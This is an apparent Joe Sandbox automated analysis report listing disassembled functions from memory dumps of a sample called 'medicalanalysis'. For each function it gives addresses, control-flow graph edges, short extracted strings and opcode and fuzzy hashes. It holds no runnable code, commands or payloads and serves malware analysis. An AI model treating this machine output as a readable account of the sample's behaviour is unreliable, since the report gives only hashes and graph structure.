                                                                                                                                                                                                                                                                                                                • String ID: Te]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-52440209
                                                                                                                                                                                                                                                                                                                • Opcode ID: 14d5fb8e9441026a8d34f5d6b8c25644bd5921347aa19a0432dcfd753b7645d3
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0fe46df2da6b147f2f9a11d5b95d612759e6c8a4843010e81a136098c465cba9
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d5fb8e9441026a8d34f5d6b8c25644bd5921347aa19a0432dcfd753b7645d3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01B1B074E05218CFDB64CFA9D984BADBBB2FB49304F2090A9D849E7255DB74AD85CF00
                                                                                                                                                                                                                                                                                                                Function 05A37B17 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2859495393.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5a30000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: daq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1532007458
                                                                                                                                                                                                                                                                                                                • Opcode ID: e6d6e056423fff0e764a2adb05c158722ca77b646d3e8813a71e0c8a3060c9b2
                                                                                                                                                                                                                                                                                                                • Instruction ID: 058ecc9bdc8d76d4e3726e4a6ab416b9bb138ca09a9888d33b67a7d94d93b401
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6d6e056423fff0e764a2adb05c158722ca77b646d3e8813a71e0c8a3060c9b2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5914CB0904618CFDB10DF69D845BADBBB2FF49304F109169E40AA7359DB346E85CF54
                                                                                                                                                                                                                                                                                                                Function 05A37B50 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2859495393.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5a30000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: daq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1532007458
                                                                                                                                                                                                                                                                                                                • Opcode ID: f97efca15fc087096eae7fc4ba9ebdfe8dd42c3d1e79e2e302b25d4c460022a0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8baa3174df94de5532188a97ebb13ccf8a068d74c45ea19684459a082eddf5b6
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f97efca15fc087096eae7fc4ba9ebdfe8dd42c3d1e79e2e302b25d4c460022a0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7913AB0E04618CFDB10DFA9D845BADBBB2FB49309F109169E40AA7359DB346E85CF40
                                                                                                                                                                                                                                                                                                                Function 00A717C0 Relevance: .2, Instructions: 214COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: cabb5e4f1ef8ef805e3612b8d414ac877a267a9c0d8ddca0bfb64e870e90640e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 58ec61f28c86df96f7dabafbbb288a5484e572bfd64eb24b2de480bc94a82571
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cabb5e4f1ef8ef805e3612b8d414ac877a267a9c0d8ddca0bfb64e870e90640e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F918C34A04108CFD758DF5DD898BA9B7F2BB88350F24D465E10A9B3A8D774AD86CF41
                                                                                                                                                                                                                                                                                                                Function 00A7179A Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 63b38e148ec69787df6d3da4d13ab7372eafefb9d2567e2aafcf698027da62a9
                                                                                                                                                                                                                                                                                                                • Instruction ID: a17c3012da779f5bdf82116090ef9fa31563651654f6ea2d8464be3056e5959f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63b38e148ec69787df6d3da4d13ab7372eafefb9d2567e2aafcf698027da62a9
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45817D34A04108CFD758DF5DD898BA9B7F2BB88310F28D465E10A9B3A9D774AD86CF41
                                                                                                                                                                                                                                                                                                                Function 00A71A1F Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b720e3de4a80f9273fe0eb037074c1d95c566e86e511331de4d3e985b55e767
                                                                                                                                                                                                                                                                                                                • Instruction ID: 317db0060619db490b53431f9abb282cbe83230c530a0f181acda0b72074e2c7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b720e3de4a80f9273fe0eb037074c1d95c566e86e511331de4d3e985b55e767
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6515534A04108CFDB58CF5DDC98BA9B7F2BB84310F24D465E10A9B3A8D774A982CF41
                                                                                                                                                                                                                                                                                                                Function 05898D60 Relevance: 6.5, Strings: 5, Instructions: 298COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 801 5898d60-5898d88 803 5898d8e-5898d92 801->803 804 5898e74-5898e99 801->804 805 5898d94-5898da0 803->805 806 5898da6-5898daa 803->806 812 5898ea0-5898ec4 804->812 805->806 805->812 808 5898ecb-5898ef0 806->808 809 5898db0-5898dc7 806->809 828 5898ef7-5898f4a 808->828 819 5898dc9-5898dd5 809->819 820 5898ddb-5898ddf 809->820 812->808 819->820 819->828 823 5898e0b-5898e24 call 5895ac8 820->823 824 5898de1-5898dfa 820->824 835 5898e4d-5898e4f 823->835 836 5898e26-5898e4a 823->836 824->823 834 5898dfc-5898dff 824->834 843 5898f4c-5898f6c 828->843 844 5898f82-5898fa7 828->844 834->823 838 5898e58-5898e71 835->838 851 5898fae-5899002 843->851 852 5898f6e-5898f7f 843->852 844->851 858 58990a9-58990f7 851->858 859 5899008-5899014 851->859 872 58990f9-589911d 858->872 873 5899127-589912d 858->873 862 589901e-5899032 call 58942d0 859->862 863 5899016-589901d 859->863 867 58990a1-58990a8 862->867 868 5899034-5899059 862->868 879 589905b-5899075 868->879 880 589909c-589909f 868->880 872->873 877 589911f 872->877 874 589913f-589914e 873->874 875 589912f-589913c 873->875 877->873 879->880 882 5899077-5899080 879->882 880->867 880->868 883 589908f-589909b 882->883 884 5899082-5899085 882->884 884->883
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq$(aq$(aq$(aq$(aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2150520858
                                                                                                                                                                                                                                                                                                                • Opcode ID: f43cc1ac223d34f878b2b6a5de1668514ed2100f9be54d6defc8425ea4136329
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9f1dd5881219a5da94babbc5ecbf9932dd2cf8a9dde3ad54750416c302664b3e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f43cc1ac223d34f878b2b6a5de1668514ed2100f9be54d6defc8425ea4136329
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54A1D1313042558FCB19DF79D8546AE7BE2FF89610B1885A9E906CB392CE35DC028B91
                                                                                                                                                                                                                                                                                                                Function 0589AC70 Relevance: 4.2, Strings: 3, Instructions: 476COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 885 589ac70-589ac98 887 589ac9a-589ace1 885->887 888 589ace6-589acf4 885->888 937 589b13d-589b144 887->937 889 589ad03 888->889 890 589acf6-589ad01 call 5898790 888->890 893 589ad05-589ad0c 889->893 890->893 895 589ad12-589ad16 893->895 896 589adf5-589adf9 893->896 900 589ad1c-589ad20 895->900 901 589b145-589b16d 895->901 897 589adfb-589ae0a call 58969b8 896->897 898 589ae4f-589ae59 896->898 914 589ae0e-589ae13 897->914 905 589ae5b-589ae6a call 5896168 898->905 906 589ae92-589aeb8 898->906 903 589ad32-589ad90 call 58984d0 call 5898f38 900->903 904 589ad22-589ad2c 900->904 911 589b174-589b19e 901->911 945 589b203-589b22d 903->945 946 589ad96-589adf0 903->946 904->903 904->911 918 589ae70-589ae8d 905->918 919 589b1a6-589b1bc 905->919 932 589aeba-589aec3 906->932 933 589aec5 906->933 911->919 920 589ae0c 914->920 921 589ae15-589ae4a call 589a738 914->921 918->937 947 589b1c4-589b1fc 919->947 920->914 921->937 938 589aec7-589aeef 932->938 933->938 950 589afc0-589afc4 938->950 951 589aef5-589af0e 938->951 957 589b22f-589b235 945->957 958 589b237-589b23d 945->958 946->937 947->945 955 589b03e-589b048 950->955 956 589afc6-589afdf 950->956 951->950 978 589af14-589af23 call 5895b90 951->978 960 589b04a-589b054 955->960 961 589b0a5-589b0ae 955->961 956->955 981 589afe1-589aff0 call 5895b90 956->981 957->958 964 589b23e-589b27b 957->964 976 589b05a-589b06c 960->976 977 589b056-589b058 960->977 966 589b0b0-589b0de call 5897ce0 call 5897d00 961->966 967 589b0e6-589b133 961->967 966->967 986 589b13b 967->986 983 589b06e-589b070 976->983 977->983 998 589af3b-589af50 978->998 999 589af25-589af2b 978->999 1004 589b008-589b013 981->1004 1005 589aff2-589aff8 981->1005 991 589b09e-589b0a3 983->991 992 589b072-589b076 983->992 986->937 991->960 991->961 993 589b078-589b091 992->993 994 589b094-589b099 call 5894990 992->994 993->994 994->991 1001 589af52-589af7e call 5896e30 998->1001 1002 589af84-589af8d 998->1002 1006 589af2d 999->1006 1007 589af2f-589af31 999->1007 1001->947 1001->1002 1002->945 1013 589af93-589afba 1002->1013 1004->945 1016 589b019-589b03c 1004->1016 1014 589affa 1005->1014 1015 589affc-589affe 1005->1015 1006->998 1007->998 1013->950 1013->978 1014->1004 1015->1004 1016->955 1016->981
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Haq$Haq$Haq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3013282719
                                                                                                                                                                                                                                                                                                                • Opcode ID: 008e1343860553d74d2ac7aeb693aa9bee3c999832be28daf41b2f27df155f3c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 83bad0561814853167f15ffb741f40387e363f9aaaf47a2420a487c3a9b1a966
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 008e1343860553d74d2ac7aeb693aa9bee3c999832be28daf41b2f27df155f3c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5125C31A042058FCB18DFA9D585AAEBBF2FF88301F188529E946DB355DB31ED46CB50
                                                                                                                                                                                                                                                                                                                Function 0589C928 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 1027 589c928-589c965 call 589ce31 1029 589c987-589c99d call 589c730 1027->1029 1030 589c967-589c96c call 589d298 1027->1030 1036 589cd13-589cd27 1029->1036 1037 589c9a3-589c9af 1029->1037 1033 589c972-589c974 1030->1033 1033->1029 1034 589c976-589c97e 1033->1034 1034->1029 1044 589cd67-589cd70 1036->1044 1038 589cae0-589cae7 1037->1038 1039 589c9b5-589c9b8 1037->1039 1042 589caed-589caf6 1038->1042 1043 589cc16-589cc53 call 589c138 call 589f0d0 1038->1043 1041 589c9bb-589c9c4 1039->1041 1045 589ce08 1041->1045 1046 589c9ca-589c9de 1041->1046 1042->1043 1048 589cafc-589cc08 call 589c138 call 589c6c8 call 589c138 1042->1048 1085 589cc59-589cd0a call 589c138 1043->1085 1049 589cd72-589cd79 1044->1049 1050 589cd35-589cd3e 1044->1050 1051 589ce0d-589ce11 1045->1051 1063 589cad0-589cada 1046->1063 1064 589c9e4-589ca79 call 589c730 * 2 call 589c138 call 589c6c8 call 589c770 call 589c818 call 589c880 1046->1064 1138 589cc0a 1048->1138 1139 589cc13-589cc14 1048->1139 1053 589cd7b-589cdbe call 589c138 1049->1053 1054 589cdc7-589cdce 1049->1054 1050->1045 1058 589cd44-589cd56 1050->1058 1056 589ce1c 1051->1056 1057 589ce13 1051->1057 1053->1054 1060 589cdd0-589cde0 1054->1060 1061 589cdf3-589ce06 1054->1061 1070 589ce1d 1056->1070 1057->1056 1071 589cd58-589cd5d 1058->1071 1072 589cd66 1058->1072 1060->1061 1077 589cde2-589cdea 1060->1077 1061->1051 1063->1038 1063->1041 1119 589ca98-589cacb call 589c880 1064->1119 1120 589ca7b-589ca93 call 589c818 call 589c138 call 589c3e8 1064->1120 1070->1070 1144 589cd60 call 589f860 1071->1144 1145 589cd60 call 589f870 1071->1145 1072->1044 1077->1061 1085->1036 1119->1063 1120->1119 1138->1139 1139->1043 1144->1072 1145->1072
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-705557208
                                                                                                                                                                                                                                                                                                                • Opcode ID: 48e118e4dc4b5ea51054b441ac9f0faaa1907c2b0f6baef98303785cb04c3b17
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7c62f5392d7e995f77d28b7ccd6ed5313d09d1126676eec8f3e833fcad9063da
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48e118e4dc4b5ea51054b441ac9f0faaa1907c2b0f6baef98303785cb04c3b17
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF1EB34B10218DFDB08DFA4D998A9DBBB2FF89300F558159E906AB365DB31EC42CB41
                                                                                                                                                                                                                                                                                                                Function 05851EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3120983240
                                                                                                                                                                                                                                                                                                                • Opcode ID: 13585f4bc5fda936d873f79b87604fbb14d3d8ded4dce8d743fd3acf435c2043
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2e1ad88b2897a59a867fd1011393a4959afe5e5d807ff8b4e387392da51df361
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13585f4bc5fda936d873f79b87604fbb14d3d8ded4dce8d743fd3acf435c2043
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB42C238E04209CFCB15DF98D588ABEBBB2BB49325F508415ED12AB254CB34AD86CF51
                                                                                                                                                                                                                                                                                                                Function 05897188 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 2047 5897188-58971ae 2048 58971bf-58971c8 2047->2048 2049 58971b0-58971bd 2047->2049 2049->2048 2050 58971cb-58971d8 2049->2050 2051 58971da-58971e1 2050->2051 2052 58971e3 2050->2052 2053 58971ea-5897214 2051->2053 2052->2053 2054 589721d-5897230 call 5896e68 2053->2054 2055 5897216 2053->2055 2058 5897374-589737b 2054->2058 2059 5897236-5897249 2054->2059 2055->2054 2060 5897381-5897396 2058->2060 2061 5897615-589761c 2058->2061 2069 589724b-5897252 2059->2069 2070 5897257-5897271 2059->2070 2074 5897398-589739a 2060->2074 2075 58973b6-58973bc 2060->2075 2062 589768b-5897692 2061->2062 2063 589761e-5897627 2061->2063 2065 5897698-58976a1 2062->2065 2066 589772e-5897735 2062->2066 2063->2062 2068 5897629-589763c 2063->2068 2065->2066 2071 58976a7-58976ba 2065->2071 2072 5897751-5897757 2066->2072 2073 5897737-5897748 2066->2073 2068->2062 2090 589763e-5897683 call 58943c0 2068->2090 2076 589736d 2069->2076 2085 5897278-5897285 2070->2085 2086 5897273-5897276 2070->2086 2095 58976cd-58976d1 2071->2095 2096 58976bc-58976cb 2071->2096 2080 5897769-5897772 2072->2080 2081 5897759-589775f 2072->2081 2073->2072 2097 589774a 2073->2097 2074->2075 2078 589739c-58973b3 2074->2078 2082 58973c2-58973c4 2075->2082 2083 5897484-5897488 2075->2083 2076->2058 2078->2075 2091 5897761-5897767 2081->2091 2092 5897775-58977b9 2081->2092 2082->2083 2084 58973ca-589744b call 58943c0 * 4 2082->2084 2083->2061 2087 589748e-5897490 2083->2087 2159 589744d-589745f call 58943c0 2084->2159 2160 5897462-5897481 call 58943c0 2084->2160 2093 5897287-589729b 2085->2093 2086->2093 2087->2061 2094 5897496-589749f 2087->2094 2090->2062 2128 5897685-5897688 2090->2128 2091->2080 2091->2092 2142 58977c1-58977ea 2092->2142 2093->2076 2127 58972a1-58972f5 2093->2127 2102 58975f2-58975f8 2094->2102 2103 58976f1-58976f3 2095->2103 2104 58976d3-58976d5 2095->2104 2096->2095 2097->2072 2107 589760b 2102->2107 2108 58975fa-5897609 2102->2108 2103->2066 2106 58976f5-58976fb 2103->2106 2104->2103 2111 58976d7-58976ee 2104->2111 2106->2066 2113 58976fd-589772b 2106->2113 2116 589760d-589760f 2107->2116 2108->2116 2111->2103 2113->2066 2116->2061 2120 58974a4-58974b2 call 5895b90 2116->2120 2134 58974ca-58974e4 2120->2134 2135 58974b4-58974ba 2120->2135 2169 5897303-5897307 2127->2169 2170 58972f7-58972f9 2127->2170 2128->2062 2134->2102 2144 58974ea-58974ee 2134->2144 2138 58974bc 2135->2138 2139 58974be-58974c0 2135->2139 2138->2134 2139->2134 2166 58977f8 2142->2166 2167 58977ec-58977f6 2142->2167 2146 589750f 2144->2146 2147 58974f0-58974f9 2144->2147 2152 5897512-589752c 2146->2152 2150 58974fb-58974fe 2147->2150 2151 5897500-5897503 2147->2151 2155 589750d 2150->2155 2151->2155 2152->2102 2174 5897532-58975b3 call 58943c0 * 4 2152->2174 2155->2152 2159->2160 2160->2083 2172 58977fd-58977ff 2166->2172 2167->2172 2169->2076 2173 5897309-5897319 2169->2173 2170->2169 2175 5897801-5897804 2172->2175 2176 5897806-589780b 2172->2176 2206 589731c call 5894440 2173->2206 2207 589731c call 5894450 2173->2207 2200 58975ca-58975f0 call 58943c0 2174->2200 2201 58975b5-58975c7 call 58943c0 2174->2201 2178 5897811-589783e 2175->2178 2176->2178 2179 589731f-5897321 2179->2076 2180 5897323-589732f 2179->2180 2183 589733e-5897344 2180->2183 2184 5897331-5897334 2180->2184 2185 589734c-5897355 2183->2185 2186 5897346-5897349 2183->2186 2184->2183 2188 5897364-589736a 2185->2188 2189 5897357-589735a 2185->2189 2186->2185 2188->2076 2189->2188 2200->2061 2200->2102 2201->2200 2206->2179 2207->2179
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: $]q$$]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-127220927
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2aea7db4cb41e60fe5473056e7bb2049d3ffda6c5272cebdd7840c1dc41f9cc6
                                                                                                                                                                                                                                                                                                                • Instruction ID: b6b9f30da9fc1878d5453eb1bd5267b5ccf1031c3b2882eca8d4f892e28338aa
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2aea7db4cb41e60fe5473056e7bb2049d3ffda6c5272cebdd7840c1dc41f9cc6
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77226B34A106198FCF19DFA4D895AADBBB2FF49305F188415EC12E7298DB34AD42CF90
                                                                                                                                                                                                                                                                                                                Function 05852EB8 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 2208 5852eb8-5852ee3 2209 5852ee5 2208->2209 2210 5852eea-5852f09 2208->2210 2209->2210 2212 5852f0b-5852f14 2210->2212 2213 5852f2a 2210->2213 2215 5852f16-5852f19 2212->2215 2216 5852f1b-5852f1e 2212->2216 2214 5852f2d-5852f31 2213->2214 2218 58534ec-5853503 2214->2218 2217 5852f28 2215->2217 2216->2217 2217->2214 2220 5852f36-5852f3a 2218->2220 2221 5853509-585350d 2218->2221 2222 5852f3c-5852f97 2220->2222 2223 5852f3f-5852f43 2220->2223 2224 5853542-5853546 2221->2224 2225 585350f-585353f 2221->2225 2233 5852f9c-5852fa0 2222->2233 2234 5852f99-5852ff5 2222->2234 2227 5852f45-5852f69 2223->2227 2228 5852f6c-5852f8e 2223->2228 2229 5853567 2224->2229 2230 5853548-5853551 2224->2230 2225->2224 2227->2228 2228->2218 2232 585356a-5853570 2229->2232 2235 5853553-5853556 2230->2235 2236 5853558-585355b 2230->2236 2238 5852fa2-5852fc6 2233->2238 2239 5852fc9-5852fec 2233->2239 2243 5852ff7-5853058 2234->2243 2244 5852ffa-5852ffe 2234->2244 2241 5853565 2235->2241 2236->2241 2238->2239 2239->2218 2241->2232 2253 585305d-5853061 2243->2253 2254 585305a-58530b6 2243->2254 2248 5853027-585303e 2244->2248 2249 5853000-5853024 2244->2249 2266 5853040-5853046 2248->2266 2267 585304e-585304f 2248->2267 2249->2248 2257 5853063-5853087 2253->2257 2258 585308a-58530ad 2253->2258 2264 58530b8-5853114 2254->2264 2265 58530bb-58530bf 2254->2265 2257->2258 2258->2218 2275 5853116-5853172 2264->2275 2276 5853119-585311d 2264->2276 2269 58530c1-58530e5 2265->2269 2270 58530e8-585310b 2265->2270 2266->2267 2267->2218 2269->2270 2270->2218 2285 5853174-58531d0 2275->2285 2286 5853177-585317b 2275->2286 2278 5853146-5853169 2276->2278 2279 585311f-5853143 2276->2279 2278->2218 2279->2278 2295 58531d5-58531d9 2285->2295 2296 58531d2-5853233 2285->2296 2287 58531a4-58531c7 2286->2287 2288 585317d-58531a1 2286->2288 2287->2218 2288->2287 2303 5853202-5853219 2295->2303 2304 58531db-58531ff 2295->2304 2305 5853235-585329d 2296->2305 2306 5853238-585323c 2296->2306 2315 5853229-585322a 2303->2315 2316 585321b-5853221 2303->2316 2304->2303 2317 58532a2-58532a6 2305->2317 2318 585329f-5853307 2305->2318 2313 5853271-5853294 2306->2313 2314 585323e-585326e 2306->2314 2313->2218 2314->2313 2315->2218 2316->2315 2324 58532a8-58532d8 2317->2324 2325 58532db-58532fe 2317->2325 2326 585330c-5853310 2318->2326 2327 5853309-5853371 2318->2327 2324->2325 2325->2218 2334 5853345-5853368 2326->2334 2335 5853312-5853342 2326->2335 2336 5853376-585337a 2327->2336 2337 5853373-58533db 2327->2337 2334->2218 2335->2334 2343 585337c-58533ac 2336->2343 2344 58533af-58533d2 2336->2344 2346 58533e0-58533e4 2337->2346 2347 58533dd-5853445 2337->2347 2343->2344 2344->2218 2353 58533e6-5853416 2346->2353 2354 5853419-585343c 2346->2354 2356 5853447-58534ac 2347->2356 2357 585344a-585344e 2347->2357 2353->2354 2354->2218 2366 58534e1-58534e4 2356->2366 2367 58534ae-58534de 2356->2367 2363 5853450-5853480 2357->2363 2364 5853483-58534a6 2357->2364 2363->2364 2364->2218 2366->2218 2367->2366
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3120983240
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2c15698e7137cfc32ca6f3a1f4ce088f983d4925afba8811f9abeb58a8f01a2d
